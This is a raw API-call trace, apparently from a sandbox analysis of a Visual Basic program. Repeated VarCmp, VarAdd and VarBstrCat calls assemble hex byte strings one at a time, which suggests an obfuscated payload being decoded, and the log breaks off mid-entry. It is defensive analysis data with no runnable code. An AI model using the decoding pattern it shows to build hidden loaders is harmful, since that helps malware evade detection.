[0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.268] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.268] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.268] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.268] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.268] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.268] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.268] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.268] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.268] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.268] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.269] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.269] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.269] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.269] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.269] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.269] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.269] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.270] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.270] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.270] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.270] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.270] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.270] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.270] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.270] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.270] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.270] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.270] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.271] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.271] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.271] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.271] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.271] VarBstrCat (in: bstrLeft="&Hf", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.271] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.272] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.272] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.272] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.272] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.272] VarBstrCat (in: bstrLeft="&H3", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.272] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.272] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.272] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.272] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.273] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.273] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.273] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&H3", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.273] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.273] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.273] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.274] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.274] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.274] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.275] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.275] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.275] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.275] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.275] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.275] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.276] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.276] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.276] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.276] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.277] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.277] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.277] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.277] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.277] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.278] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.279] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.279] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.279] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.280] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.280] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.280] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.280] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.280] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.280] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.280] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.280] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] 